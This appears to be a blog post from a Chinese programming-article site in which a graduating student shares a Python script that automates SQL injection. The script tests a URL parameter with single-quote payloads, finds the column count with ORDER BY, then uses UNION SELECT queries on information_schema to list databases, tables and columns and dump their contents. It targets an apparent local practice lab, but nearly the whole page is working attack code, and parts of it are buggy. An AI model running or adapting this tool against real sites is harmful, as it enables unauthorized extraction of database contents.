欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

SQL注入自动化python脚本

程序员文章站 2024-03-15 18:03:24
...

写了一个python3注入sql的脚本
临近毕业,尝试写一些自动注入和自动扫描的脚本
发现还是不够自动
后面我再改改。现在脖子疼
实现效果
SQL注入自动化python脚本
SQL注入自动化python脚本
SQL注入自动化python脚本
代码如下:

import requests
from bs4 import BeautifulSoup
from colorama import init, Fore, Back, Style
import sys
import time
import urllib.parse
import re
from prettytable import PrettyTable

init(autoreset=True)


class Colored(object):

    # 前景色:红色 背景色:默认
    def red(self, s):
        return Fore.RED + s + Fore.RESET

    # 前景色:绿色 背景色:默认
    def green(self, s):
        return Fore.GREEN + s + Fore.RESET

    # 前景色:黄色 背景色:默认
    def yellow(self, s):
        return Fore.YELLOW + s + Fore.RESET

    # 前景色:蓝色 背景色:默认
    def blue(self, s):
        return Fore.BLUE + s + Fore.RESET

    # 前景色:洋红色 背景色:默认
    def magenta(self, s):
        return Fore.MAGENTA + s + Fore.RESET

    # 前景色:青色 背景色:默认
    def cyan(self, s):
        return Fore.CYAN + s + Fore.RESET

    # 前景色:白色 背景色:默认
    def white(self, s):
        return Fore.WHITE + s + Fore.RESET

    # 前景色:黑色 背景色:默认
    def black(self, s):
        return Fore.BLACK

    # 前景色:白色 背景色:绿色
    def white_green(self, s):
        return Fore.WHITE + Back.GREEN + s + Fore.RESET + Back.RESET


color = Colored()


def single_quotes_injection(url, param_dict, no_param_url):  # 单引号注入
    if len(param_dict) == 1:
        payload_one = url + "%27/**/and/**/1=1--+"  # 一定正确的payload
        payload_two = url + "%27/**/and/**/1=2--+"  # 是否报错的payload
        print(
            color.white("[")
            + color.blue(time.strftime("%H:%M:%S"))
            + color.white("]")
            + color.white("[")
            + color.magenta("payload")
            + color.white("]")
            + color.white("正在执行")
            + color.green(payload_one)
        )
        print(
            color.white("[")
            + color.blue(time.strftime("%H:%M:%S"))
            + color.white("]")
            + color.white("[")
            + color.magenta("payload")
            + color.white("]")
            + color.white("正在执行")
            + color.green(payload_two)
        )
        # print(payload_one)
        response_one = requests.get(payload_one)
        response_two = requests.get(payload_two)
        if response_one.status_code != 200:
            print(color.red("该网站可能部署了waf"))

        # soup_one = BeautifulSoup(response_one.content,'html.parser')
        # soup_two = BeautifulSoup(response_two.content,'html.parser')
        if len(response_one.text) != len(response_two.text):  # 判断是否报错,报错则爆出是sql注入漏洞
            print(
                color.white("[")
                + color.blue(time.strftime("%H:%M:%S"))
                + color.white("]")
                + color.white("[")
                + color.green("INFO")
                + color.white("]")
                + color.yellow("可能存在sql注入漏洞\n")
                + color.white("[")
                + color.blue(time.strftime("%H:%M:%S"))
                + color.white("]")
                + color.white("[")
                + color.magenta("payload")
                + color.white("]")
                + color.green(payload_one)
                + color.white("\n[")
                + color.blue(time.strftime("%H:%M:%S"))
                + color.white("]")
                + color.white("[")
                + color.magenta("payload")
                + color.white("]")
                + color.green(payload_two)
            )
            print(
                color.white("[")
                + color.blue(time.strftime("%H:%M:%S"))
                + color.white("]")
                + color.white("[")
                + color.green("INFO")
                + color.white("]")
                + color.yellow("正在判断是否有回显")
            )
            response = requests.get(
                url + "%27/**/order/**/by/**/1--+"
            )  # 通过order by 判断漏洞是否有回显    这是一定正确的response
            for i in range(1, 15):
                response = requests.get(url + "%27/**/order/**/by/**/" + str(i) + "--+")
                # print(len(response.text))
                if len(response_one.text) != len(
                    response.text
                ):  # 判断谁是第一个长度改变的响应体     判断谁是报错的值,如果都没有报错,证明不是报错注入
                    column_num = i
                    break
                if i == 14:  # 判断的长度为14
                    column_num = 0
            if column_num == 0:  # 判断是否回显
                print(
                    color.white("[")
                    + color.blue(time.strftime("%H:%M:%S"))
                    + color.white("]")
                    + color.white("[")
                    + color.green("INFO")
                    + color.white("]")
                    + color.red("未开启mysql_error()报错  可以尝试盲注")
                )
            else:
                print(
                    color.white("[")
                    + color.blue(time.strftime("%H:%M:%S"))
                    + color.white("]")
                    + color.white("[")
                    + color.green("INFO")
                    + color.white("]")
                    + color.yellow("存在回显\n")
                    + color.white("[")
                    + color.blue(time.strftime("%H:%M:%S"))
                    + color.white("]")
                    + color.white("[")
                    + color.green("INFO")
                    + color.white("]")
                    + color.yellow("列长为")
                    + color.cyan(str(column_num - 1))
                    + color.white("\n[")
                    + color.blue(time.strftime("%H:%M:%S"))
                    + color.white("]")
                    + color.white("[")
                    + color.magenta("payload")
                    + color.white("]"),
                    end="",
                )
                payload_mysql = "%27/**/union/**/select/**/"
                print(color.green(url + "%27/**/union/**/select/**/"), end="")
                # print(column_num)
                for j in range(1, column_num):
                    # print(j)
                    if j == column_num - 1:
                        print(color.green(str(j)), end="")
                        payload_mysql += str(j)
                    else:
                        print(color.green(str(j) + ","), end="")
                        payload_mysql += str(j) + ","
                print(color.green("--+"))  # 循环输出建议payload中小于列值的数字
                payload_mysql += "--+"
                for i in param_dict.items():
                    # print(param_dict)
                    # print(i[1])
                    # print(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,2,3--+')
                    echo_response = requests.get(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,2,3--+')
                    echo_1_cnt = str(echo_response.content).count('1')
                    echo_2_cnt = str(echo_response.content).count('2')
                    echo_3_cnt = str(echo_response.content).count('3')
                    # print(echo_1_cnt)
                    # print(echo_2_cnt)
                    # print(echo_3_cnt)
                    if echo_1_cnt == 1:
                        place_left = str(echo_response.content).find('2')
                        place_right_one = str(echo_response.content).find('2') + 1
                        place_right_two = str(echo_response.content).find('2') + 17
                        right_text = str(echo_response.content)[place_right_one:place_right_two]

                        # print(right_text)
                        # print(place_right_one)
                        
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("payload")
                            + color.white("]")
                            + color.white("正在执行")
                            + color.green(payload_two)
                        )
                        echo_response_two = requests.get(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat(schema_name),2,3/**/from/**/information_schema.schemata--+')
                        right_place = str(echo_response_two.content).find(right_text)
                        dbs = str(echo_response_two.content)[place_left:right_place]

                        version_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/version(),2,3--+'
                        version_request = requests.get(version_payload)
                        version_right_place = str(version_request.content).find(right_text)
                        version = str(version_request.content)[place_left:version_right_place]
                        # print(version)
                        if '<' in version:
                            place = version.find('<')[0]
                            result_version = version[:place]
                        if '"' in version:
                            place = version.find('"')[0]
                            result_version = version[:place]
                        else:
                            result_version = version
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("Version")
                            + color.white("]")
                            + color.white("数据库版本  ")
                            + color.green(result_version)
                        )
                        # print(result_version)
                        version_table = PrettyTable(["Version"])
                        version_table.add_row([result_version])
                        print(version_table)
                        # print(dbs)
                        if '<' in dbs:
                            place = dbs.find('<')[0]
                            database = dbs[:place]
                        if '"' in dbs:
                            place = dbs.find('"')[0]
                            database = dbs[:place]
                        else:
                            database = dbs

                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("database")
                            + color.white("]")
                            + color.yellow("数据库有\n")
                        )

                        dbs_list = database.split(',')
                        dbs_table = PrettyTable(["Database"])
                        for dbs_row in dbs_list:
                            dbs_table.add_row([dbs_row])
                        print(dbs_table)
                        inj_database = input(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("输入")
                            + color.white("]")
                            + color.yellow("请输入你要注入的数据库:")
                        )
                        table_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables where table_schema=' + '"' + inj_database + '"' + '--+'
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("payload")
                            + color.white("]")
                            + color.white("正在执行")
                            + color.green(table_payload)
                        )
                        echo_response_three = requests.get(table_payload)
                        right_place = str(echo_response_three.content).find(right_text)
                        tables = str(echo_response_three.content)[place_left:right_place]
                        # print(tables)
                        if '<' in tables:
                            place = tables.find('<')[0]
                            tbs = tables[:place]
                        if '"' in tables:
                            place = tables.find('"')[0]
                            tbs = tables[:place]
                        else:
                            tbs = tables
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("tables")
                            + color.white("]")
                            + color.yellow("表有\n")
                            # + color.green(tbs)
                        )
                        tbs_list = tbs.split(',')
                        # print(tbs_list)
                        tbs_table = PrettyTable(["Tables_in_" + inj_database])
                        for tbs_row in tbs_list:
                            tbs_table.add_row([tbs_row])
                        print(tbs_table)
                        inj_table = input(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("输入")
                            + color.white("]")
                            + color.yellow("请输入你要注入的表:")
                        )
                        column_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name="' + inj_table + '"--+'
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("payload")
                            + color.white("]")
                            + color.white("正在执行")
                            + color.green(column_payload)
                        )
                        # print(column_payload)
                        echo_column_response = requests.get(column_payload)
                        right_place = str(echo_column_response.content).find(right_text)
                        columns = str(echo_column_response.content)[place_left:right_place]
                        if '<' in columns:
                            place = columns.find('<')[0]
                            clms = columns[:place]
                        if '"' in columns:
                            place = columns.find('"')[0]
                            clms = columns[:place]
                        else:
                            clms = columns
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("columns")
                            + color.white("]")
                            + color.yellow("列有\n")
                            # + color.green(clms)
                        )
                        change_clms = clms.replace(',', '," ",')
                        clms_list = clms.split(',')
                        clms_table = PrettyTable(clms_list)
                        value_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/group_concat('+ change_clms +'),2,3/**/from/**/' + inj_table +'--+'
                        echo_value_response = requests.get(value_payload)
                        right_place = str(echo_value_response.content).find(right_text)
                        value = str(echo_value_response.content)[place_left:right_place]
                        result_value = value.split(',')
                        for i in result_value:
                            value_list = i.split(' ')
                            clms_table.add_row(value_list)
                        print(clms_table)
                    elif echo_2_cnt == 1:
                        
                        place_left = str(echo_response.content).find('2')
                        place_right_one = str(echo_response.content).find('2') + 1
                        place_right_two = str(echo_response.content).find('2') + 17
                        right_text = str(echo_response.content)[place_right_one:place_right_two]

                        # print(right_text)
                        # print(place_right_one)
                        
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("payload")
                            + color.white("]")
                            + color.white("正在执行")
                            + color.green(payload_two)
                        )
                        echo_response_two = requests.get(no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat(schema_name),3/**/from/**/information_schema.schemata--+')
                        right_place = str(echo_response_two.content).find(right_text)
                        dbs = str(echo_response_two.content)[place_left:right_place]

                        version_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,version(),3--+'
                        version_request = requests.get(version_payload)
                        version_right_place = str(version_request.content).find(right_text)
                        version = str(version_request.content)[place_left:version_right_place]
                        # print(version)
                        if '<' in version:
                            place = version.find('<')[0]
                            result_version = version[:place]
                        if '"' in version:
                            place = version.find('"')[0]
                            result_version = version[:place]
                        else:
                            result_version = version
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("Version")
                            + color.white("]")
                            + color.white("数据库版本  ")
                            + color.green(result_version)
                        )
                        # print(result_version)
                        version_table = PrettyTable(["Version"])
                        version_table.add_row([result_version])
                        print(version_table)
                        # print(dbs)
                        if '<' in dbs:
                            place = dbs.find('<')[0]
                            database = dbs[:place]
                        if '"' in dbs:
                            place = dbs.find('"')[0]
                            database = dbs[:place]
                        else:
                            database = dbs

                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("database")
                            + color.white("]")
                            + color.yellow("数据库有\n")
                        )

                        dbs_list = database.split(',')
                        dbs_table = PrettyTable(["Database"])
                        for dbs_row in dbs_list:
                            dbs_table.add_row([dbs_row])
                        print(dbs_table)
                        inj_database = input(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("输入")
                            + color.white("]")
                            + color.yellow("请输入你要注入的数据库:")
                        )
                        table_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables where table_schema=' + '"' + inj_database + '"' + '--+'
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("payload")
                            + color.white("]")
                            + color.white("正在执行")
                            + color.green(table_payload)
                        )
                        echo_response_three = requests.get(table_payload)
                        right_place = str(echo_response_three.content).find(right_text)
                        tables = str(echo_response_three.content)[place_left:right_place]
                        # print(tables)
                        if '<' in tables:
                            place = tables.find('<')[0]
                            tbs = tables[:place]
                        if '"' in tables:
                            place = tables.find('"')[0]
                            tbs = tables[:place]
                        else:
                            tbs = tables
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("tables")
                            + color.white("]")
                            + color.yellow("表有\n")
                            # + color.green(tbs)
                        )
                        tbs_list = tbs.split(',')
                        # print(tbs_list)
                        tbs_table = PrettyTable(["Tables_in_" + inj_database])
                        for tbs_row in tbs_list:
                            tbs_table.add_row([tbs_row])
                        print(tbs_table)
                        inj_table = input(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("输入")
                            + color.white("]")
                            + color.yellow("请输入你要注入的表:")
                        )
                        column_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name="' + inj_table + '"--+'
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("payload")
                            + color.white("]")
                            + color.white("正在执行")
                            + color.green(column_payload)
                        )
                        # print(column_payload)
                        echo_column_response = requests.get(column_payload)
                        right_place = str(echo_column_response.content).find(right_text)
                        columns = str(echo_column_response.content)[place_left:right_place]
                        if '<' in columns:
                            place = columns.find('<')[0]
                            clms = columns[:place]
                        if '"' in columns:
                            place = columns.find('"')[0]
                            clms = columns[:place]
                        else:
                            clms = columns
                        print(
                            color.white("[")
                            + color.blue(time.strftime("%H:%M:%S"))
                            + color.white("]")
                            + color.white("[")
                            + color.magenta("columns")
                            + color.white("]")
                            + color.yellow("列有\n")
                            # + color.green(clms)
                        )
                        change_clms = clms.replace(',', '," ",')
                        clms_list = clms.split(',')
                        clms_table = PrettyTable(clms_list)
                        value_payload = no_param_url + '?' + i[0] + '=' + i[1] + '%27/**/union/**/select/**/1,group_concat('+ change_clms +'),3/**/from/**/' + inj_table +'--+'
                        echo_value_response = requests.get(value_payload)
                        right_place = str(echo_value_response.content).find(right_text)
                        value = str(echo_value_response.content)[place_left:right_place]
                        result_value = value.split(',')
                        for i in result_value:
                            value_list = i.split(' ')
                            # print(value_list)
                            clms_table.add_row(value_list)
                        print(clms_table)


                    elif echo_3_cnt == 1:
                        pass
                        
        else:
            print(
                color.white("[")
                + color.blue(time.strftime("%H:%M:%S"))
                + color.white("]")
                + color.white("[")
                + color.green("返回")
                + color.white("]")
                + color.red("不存在sql注入")
            )
            



def get_url_param(url):
    try:
        index = url.find("?")
        if index < 0:
            result_url = url
        else:
            result_url = url[:index]
        url_param = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(url).query))

        result_param = {}
        for key, value in url_param.items():
            try:
                if isinstance(int(value), int):
                    if int(value) > 0:
                        result_param[key] = '-' + value
                    elif int(value) == 0:
                        result_param[key] = '-1'
                    else:
                        result_param[key] = '-1'
                else:
                    result_param[key] = value
            except:
                result_param[key] = value
            
        # print(result_param)
        for key, value in result_param.items():
            try:
                request_url = result_url + '?' + key + '=' + str(abs(int(value)))
            except:
                request_url = url
        return [result_url, result_param, request_url]
    except:
        print(
            color.white("[")
            + color.blue(time.strftime("%H:%M:%S"))
            + color.white("]")
            + color.white("[")
            + color.green("错误")
            + color.white("]")
            + color.red("没有参数可以注入")
        )
        sys.exit(0)

if __name__ == "__main__":
    url = "http://localhost/less-1/?id=1"
    url_and_param = get_url_param(url)
    # print(url_and_param)
    no_param_url = url_and_param[0]
    json_param = url_and_param[1]
    param_url = url_and_param[2]
    single_quotes_injection(param_url, json_param, no_param_url)
    # number_injection('http://localhost/less-2/?id=1')